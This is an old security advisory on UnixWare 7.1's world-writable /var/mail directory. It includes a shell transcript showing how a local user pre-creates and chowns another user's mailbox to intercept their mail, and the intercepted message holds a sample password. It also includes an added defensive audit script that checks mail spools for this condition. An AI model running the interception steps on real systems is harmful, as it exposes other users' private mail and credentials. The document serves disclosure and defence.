COMMAND
mail
SYSTEMS AFFECTED
UnixWare 7.x
PROBLEM
Brock Tellier found the following. Only UnixWare 7.1 was tested.
Imagine your surprise if you saw that /var/mail is mode 777. As such,
any user may create a file called /var/mail/<username> with a
mode readable by him and trap all incoming mail. Afraid of
getting caught? chown the file to <username> leaving it still
world-readable, and no one will ever know who did it. All of this
assumes, of course, that the user has not received any mail yet.
If you keep track of your /etc/passwd file, you can monitor for
new entries and create the files as needed.
This permissions problem obviously opens the door for all sorts of
problems with symlinks and such. One would imagine that some mail
delivery programs which aren't as smart as sendmail will follow
symlinks in /var/mail. And as if all this wasn't bad enough,
UnixWare's /usr/bin/mail is a BIG LIE:
bash-2.02$ cat /usr/bin/mail
#!/bin/sh
cat > /dev/null
exit 0
bash-2.02$
Exploit:
bash-2.02$ id
uid=106(xnec) gid=1(other)
bash-2.02$ pwd
/var/mail
bash-2.02$ touch btellier
bash-2.02$ chown btellier btellier
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 0 Dec 4 07:54 btellier
Now wait for btellier to get some mail...
bash-2.02$ ls -la btellier
-rw-r--r-- 1 btellier other 410 Dec 4 07:55 btellier
bash-2.02$ cat btellier
From root Sat Dec 4 07:55:29 1999
Return-Path: root
Received: (from root@localhost) by localhost (8.8.7/UW7.1.0) id HAA04842
for btellier; Sat, 4 Dec 1999 07:55:29 -0600 (CST)
Date: Sat, 4 Dec 1999 07:55:29 -0600 (CST)
From: root@localhost
Message-Id: <199912041355.HAA04842@localhost>
Status:
X-Status:
X-SCO-PAD: XXXXXX
X-SCO-UID: 1
Content-Length: 52
your ueber-secure password on 0wned.com is a@f9;se0
bash-2.02$
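A defender's check for the condition described above, added here as an example (it is not part of the original advisory and not UnixWare's own tooling): a POSIX shell audit of a mail spool directory that flags a world-writable spool (noting whether the sticky bit is set), mailboxes that are symlinks, mailboxes whose owner does not match the file name (the pre-created-mailbox trick), and mailboxes readable by others. It reads ownership and mode from `ls -ld` so it does not depend on GNU `stat`. The demo spool it builds in a temporary directory is constructed: the `btellier` name is taken from the advisory, `trap` is a made-up entry, and the clean mailbox is named after whatever user runs the script.

```shell
#!/bin/sh
# Mail spool audit (hypothetical example, not from the advisory).
# Usage: audit_mail_spool /var/mail   -> prints one "WARN <reason> <path>" line
# per finding and returns the number of findings as its exit status.

mode_of()  { ls -ld "$1" | cut -c1-10; }        # e.g. drwxrwxrwx
owner_of() { ls -ld "$1" | awk '{print $3}'; }  # owner column of ls -l

audit_mail_spool() {
    dir=$1
    findings=0
    m=$(mode_of "$dir")
    # Character 9 of the mode string is the "others write" bit, 10 the sticky bit.
    if [ "$(echo "$m" | cut -c9)" = "w" ]; then
        case $(echo "$m" | cut -c10) in
            t|T) echo "WARN spool-world-writable-sticky $dir" ;;
            *)   echo "WARN spool-world-writable $dir" ;;   # the UnixWare 7.1 condition
        esac
        findings=$((findings + 1))
    fi
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # empty dir leaves the glob literal
        name=${f##*/}
        if [ -L "$f" ]; then                      # a naive delivery agent may follow it
            echo "WARN mailbox-is-symlink $f"; findings=$((findings + 1)); continue
        fi
        if [ "$(owner_of "$f")" != "$name" ]; then  # mailbox not owned by its user
            echo "WARN mailbox-owner-mismatch $f"; findings=$((findings + 1))
        fi
        if [ "$(mode_of "$f" | cut -c8)" = "r" ]; then  # anyone can read the mail
            echo "WARN mailbox-world-readable $f"; findings=$((findings + 1))
        fi
    done
    return $findings
}

# Convenience wrapper: print only the number of findings.
count_spool_findings() { audit_mail_spool "$1" | grep -c '^WARN' || true; }

# Constructed demo spool reproducing the advisory's layout in a temp dir.
build_demo_spool() {
    tmp=$(mktemp -d) || return 1
    chmod 777 "$tmp"                                   # world-writable, no sticky bit
    : > "$tmp/.probe"; me=$(owner_of "$tmp/.probe"); rm -f "$tmp/.probe"
    : > "$tmp/$me";      chmod 600 "$tmp/$me"          # clean: own mailbox, private
    : > "$tmp/btellier"; chmod 644 "$tmp/btellier"     # pre-created for another user
    ln -s /dev/null "$tmp/trap"                        # made-up symlink entry
    echo "$tmp"
}

spool=$(build_demo_spool)
audit_mail_spool "$spool" || :   # expect 4 WARN lines for the demo spool
rm -rf "$spool"
```

Run against a real spool with `audit_mail_spool /var/mail` from cron; a non-zero exit status means something needs a look. On a box where the running user happens to be named `btellier` the demo's owner-mismatch line would not appear, which is the check working as intended.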
SOLUTION
Fix is out.